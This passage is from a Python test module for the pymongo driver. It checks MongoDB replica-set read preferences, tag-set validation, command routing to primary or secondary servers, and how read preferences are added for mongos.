return 'secondary'
else:
self.fail(
'Cursor used address %s, expected either primary '
'%s or secondaries %s' % (
address, client.primary, client.secondaries))
def assertReadsFrom(self, expected, **kwargs):
c = rs_client(**kwargs)
wait_until(
lambda: len(c.nodes) == self.w,
"discovered all nodes")
used = self.read_from_which_kind(c)
self.assertEqual(expected, used, 'Cursor used %s, expected %s' % (
used, expected))
class TestSingleSlaveOk(TestReadPreferencesBase):
def test_reads_from_secondary(self):
host, port = next(iter(self.client.secondaries))
# Direct connection to a secondary.
client = single_client(host, port)
self.assertFalse(client.is_primary)
# Regardless of read preference, we should be able to do
# "reads" with a direct connection to a secondary.
# See server-selection.rst#topology-type-single.
self.assertEqual(client.read_preference, ReadPreference.PRIMARY)
db = client.pymongo_test
coll = db.test
# Test find and find_one.
self.assertIsNotNone(coll.find_one())
self.assertEqual(10, len(list(coll.find())))
# Test some database helpers.
self.assertIsNotNone(db.collection_names())
self.assertIsNotNone(db.validate_collection("test"))
self.assertIsNotNone(db.command("count", "test"))
# Test some collection helpers.
self.assertEqual(10, coll.count())
self.assertEqual(10, len(coll.distinct("_id")))
self.assertIsNotNone(coll.aggregate([]))
self.assertIsNotNone(coll.index_information())
# Test some "magic" namespace helpers.
self.assertIsNotNone(db.current_op())
client.unlock() # No error.
class TestReadPreferences(TestReadPreferencesBase):
def test_mode_validation(self):
for mode in (ReadPreference.PRIMARY,
ReadPreference.PRIMARY_PREFERRED,
ReadPreference.SECONDARY,
ReadPreference.SECONDARY_PREFERRED,
ReadPreference.NEAREST):
self.assertEqual(
mode,
rs_client(read_preference=mode).read_preference)
self.assertRaises(
TypeError,
rs_client, read_preference='foo')
def test_tag_sets_validation(self):
# Can't use tags with PRIMARY
self.assertRaises(ConfigurationError, _ServerMode,
0, tag_sets=[{'k': 'v'}])
# ... but empty tag sets are ok with PRIMARY
self.assertRaises(ConfigurationError, _ServerMode,
0, tag_sets=[{}])
S = Secondary(tag_sets=[{}])
self.assertEqual(
[{}],
rs_client(read_preference=S).read_preference.tag_sets)
S = Secondary(tag_sets=[{'k': 'v'}])
self.assertEqual(
[{'k': 'v'}],
rs_client(read_preference=S).read_preference.tag_sets)
S = Secondary(tag_sets=[{'k': 'v'}, {}])
self.assertEqual(
[{'k': 'v'}, {}],
rs_client(read_preference=S).read_preference.tag_sets)
self.assertRaises(ValueError, Secondary, tag_sets=[])
# One dict not ok, must be a list of dicts
self.assertRaises(TypeError, Secondary, tag_sets={'k': 'v'})
self.assertRaises(TypeError, Secondary, tag_sets='foo')
self.assertRaises(TypeError, Secondary, tag_sets=['foo'])
def test_threshold_validation(self):
self.assertEqual(17, rs_client(
localThresholdMS=17
).local_threshold_ms)
self.assertEqual(42, rs_client(
localThresholdMS=42
).local_threshold_ms)
self.assertEqual(666, rs_client(
localthresholdms=666
).local_threshold_ms)
def test_primary(self):
self.assertReadsFrom(
'primary', read_preference=ReadPreference.PRIMARY)
def test_primary_with_tags(self):
# Tags not allowed with PRIMARY
self.assertRaises(
ConfigurationError,
rs_client, tag_sets=[{'dc': 'ny'}])
def test_primary_preferred(self):
self.assertReadsFrom(
'primary', read_preference=ReadPreference.PRIMARY_PREFERRED)
def test_secondary(self):
self.assertReadsFrom(
'secondary', read_preference=ReadPreference.SECONDARY)
def test_secondary_preferred(self):
self.assertReadsFrom(
'secondary', read_preference=ReadPreference.SECONDARY_PREFERRED)
def test_nearest(self):
# With high localThresholdMS, expect to read from any
# member
c = rs_client(
read_preference=ReadPreference.NEAREST,
localThresholdMS=10000) # 10 seconds
data_members = set(self.hosts).difference(set(self.arbiters))
# This is a probabilistic test; track which members we've read from so
# far, and keep reading until we've used all the members or give up.
# Chance of using only 2 of 3 members 10k times if there's no bug =
# 3 * (2/3)**10000, very low.
used = set()
i = 0
while data_members.difference(used) and i < 10000:
address = self.read_from_which_host(c)
used.add(address)
i += 1
not_used = data_members.difference(used)
latencies = ', '.join(
'%s: %dms' % (server.description.address,
server.description.round_trip_time)
for server in c._get_topology().select_servers(any_server_selector))
self.assertFalse(
not_used,
"Expected to use primary and all secondaries for mode NEAREST,"
" but didn't use %s\nlatencies: %s" % (not_used, latencies))
class ReadPrefTester(MongoClient):
def __init__(self, *args, **kwargs):
self.has_read_from = set()
super(ReadPrefTester, self).__init__(*args, **kwargs)
@contextlib.contextmanager
def _socket_for_reads(self, read_preference):
context = super(ReadPrefTester, self)._socket_for_reads(read_preference)
with context as (sock_info, slave_ok):
self.record_a_read(sock_info.address)
yield sock_info, slave_ok
def record_a_read(self, address):
server = self._get_topology().select_server_by_address(address, 0)
self.has_read_from.add(server)
_PREF_MAP = [
(Primary, SERVER_TYPE.RSPrimary),
(PrimaryPreferred, SERVER_TYPE.RSPrimary),
(Secondary, SERVER_TYPE.RSSecondary),
(SecondaryPreferred, SERVER_TYPE.RSSecondary),
(Nearest, 'any')
]
class TestCommandAndReadPreference(TestReplicaSetClientBase):
def setUp(self):
super(TestCommandAndReadPreference, self).setUp()
self.c = ReadPrefTester(
'%s:%s' % (host, port),
replicaSet=self.name,
# Ignore round trip times, to test ReadPreference modes only.
localThresholdMS=1000*1000)
if client_context.auth_enabled:
self.c.admin.authenticate(db_user, db_pwd)
self.client_version = Version.from_client(self.c)
self.addCleanup(self.c.drop_database, 'pymongo_test')
def executed_on_which_server(self, client, fn, *args, **kwargs):
"""Execute fn(*args, **kwargs) and return the Server instance used."""
client.has_read_from.clear()
fn(*args, **kwargs)
self.assertEqual(1, len(client.has_read_from))
return one(client.has_read_from)
def assertExecutedOn(self, server_type, client, fn, *args, **kwargs):
server = self.executed_on_which_server(client, fn, *args, **kwargs)
self.assertEqual(SERVER_TYPE._fields[server_type],
SERVER_TYPE._fields[server.description.server_type])
def _test_fn(self, server_type, fn):
for _ in range(10):
if server_type == 'any':
used = set()
for _ in range(1000):
server = self.executed_on_which_server(self.c, fn)
used.add(server.description.address)
if len(used) == len(self.c.secondaries) + 1:
# Success
break
unused = self.c.secondaries.union(
set([self.c.primary])
).difference(used)
if unused:
self.fail(
"Some members not used for NEAREST: %s" % (
unused))
else:
self.assertExecutedOn(server_type, self.c, fn)
def _test_primary_helper(self, func):
# Helpers that ignore read preference.
self._test_fn(SERVER_TYPE.RSPrimary, func)
def _test_coll_helper(self, secondary_ok, coll, meth, *args, **kwargs):
for mode, server_type in _PREF_MAP:
new_coll = coll.with_options(read_preference=mode())
func = lambda: getattr(new_coll, meth)(*args, **kwargs)
if secondary_ok:
self._test_fn(server_type, func)
else:
self._test_fn(SERVER_TYPE.RSPrimary, func)
def test_command(self):
# Test that the generic command helper obeys the read preference
# passed to it.
for mode, server_type in _PREF_MAP:
func = lambda: self.c.pymongo_test.command('dbStats',
read_preference=mode())
self._test_fn(server_type, func)
def test_create_collection(self):
# Collections should be created on primary, obviously
self._test_primary_helper(
lambda: self.c.pymongo_test.create_collection(
'some_collection%s' % random.randint(0, MAXSIZE)))
def test_drop_collection(self):
self._test_primary_helper(
lambda: self.c.pymongo_test.drop_collection('some_collection'))
self._test_primary_helper(
lambda: self.c.pymongo_test.some_collection.drop())
def test_group(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'group',
{'a': 1}, {}, {}, 'function() { }')
def test_map_reduce(self):
# mapreduce fails if no collection
coll = self.c.pymongo_test.test.with_options(
write_concern=WriteConcern(w=self.w))
coll.insert_one({})
self._test_coll_helper(False, self.c.pymongo_test.test, 'map_reduce',
'function() { }', 'function() { }', 'mr_out')
self._test_coll_helper(False, self.c.pymongo_test.test, 'map_reduce',
'function() { }', 'function() { }',
{'inline': 1})
def test_inline_map_reduce(self):
# mapreduce fails if no collection
coll = self.c.pymongo_test.test.with_options(
write_concern=WriteConcern(w=self.w))
coll.insert_one({})
self._test_coll_helper(True, self.c.pymongo_test.test,
'inline_map_reduce',
'function() { }', 'function() { }')
def test_count(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'count')
def test_distinct(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'distinct', 'a')
def test_aggregate(self):
if self.client_version.at_least(2, 1, 0):
self._test_coll_helper(True, self.c.pymongo_test.test,
'aggregate',
[{'$project': {'_id': 1}}])
class TestMovingAverage(unittest.TestCase):
def test_moving_average(self):
avg = MovingAverage()
self.assertIsNone(avg.get())
avg.add_sample(10)
self.assertAlmostEqual(10, avg.get())
avg.add_sample(20)
self.assertAlmostEqual(12, avg.get())
avg.add_sample(30)
self.assertAlmostEqual(15.6, avg.get())
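# The expected values above are consistent with an exponentially weighted
# average that gives each new sample a weight of 0.2 (a sketch of the
# arithmetic, not pymongo's implementation): 10, then 0.8*10 + 0.2*20 = 12,
# then 0.8*12 + 0.2*30 = 15.6.
def _ewma_sketch(samples, alpha=0.2):
    avg = None
    for s in samples:
        avg = s if avg is None else (1 - alpha) * avg + alpha * s
    return avg
# _ewma_sketch([10, 20, 30]) -> 15.6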
class TestMongosAndReadPreference(unittest.TestCase):
def test_maybe_add_read_preference(self):
# Primary doesn't add $readPreference
out = _maybe_add_read_preference({}, Primary())
self.assertEqual(out, {})
pref = PrimaryPreferred()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = PrimaryPreferred(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Secondary()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Secondary(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
# SecondaryPreferred without tag_sets doesn't add $readPreference
pref = SecondaryPreferred()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(out, {})
pref = SecondaryPreferred(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Nearest()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Nearest(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
criteria = SON([("$query", {}), ("$orderby", SON([("_id", 1)]))])
pref = Nearest()
out = _maybe_add_read_preference(criteria, pref)
self.assertEqual(
out,
SON([("$query", {}),
("$orderby", SON([("_id", 1)])),
("$readPreference", pref.document)]))
pref = Nearest(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference(criteria, pref)
self.assertEqual(
out,
SON([("$query", {}),
("$orderby", SON([("_id", 1)])),
("$readPreference", pref.document)]))
@client_context.require_mongos
def test_mongos(self):
shard = client_context.client.config.shards.find_one()['host']
num_members = shard.count(',') + 1
if num_members == 1:
raise SkipTest("Need a replica set shard to test.")
coll = client_context.client.pymongo_test.get_collection(
"test",
write_concern=WriteConcern(w=num_members))
coll.drop()
res = coll.insert_many([{} for _ in range(5)])
first_id = res.inserted_ids[0]
last_id = res.inserted_ids[-1]
# Note - this isn't a perfect test since there's no way to
# tell what shard member a query ran on.
for pref in (Primary(),
PrimaryPreferred(),
Secondary(),
SecondaryPreferred(),
Nearest()):
qcoll = coll.with_options(read_preference=pref)
results = list(qcoll.find().sort([("_id", 1)]))
self.assertEqual(first_id, results[0]["_id"])
self.assertEqual(last_id, results[-1]["_id"])
results = list(qcoll.find().sort([("_id", -1)]))
self.assertEqual(first_id, results[-1]["_id"])
self.assertEqual(last_id, results[0]["_id"])
if __name__ == "__main__":
unittest.main()
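# Usage sketch (illustrative, not part of the test module): how the read
# preferences exercised above are applied in application code. The host, port,
# replica-set name and tag set are assumptions.
def _read_preference_usage_sketch():
    client = MongoClient("localhost", 27017, replicaSet="rs0")
    # Per-database and per-collection read preferences:
    db = client.get_database(
        "pymongo_test", read_preference=ReadPreference.SECONDARY_PREFERRED)
    coll = db.test.with_options(
        read_preference=Nearest(tag_sets=[{"dc": "ny"}, {}]))
    return coll.find_one()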
|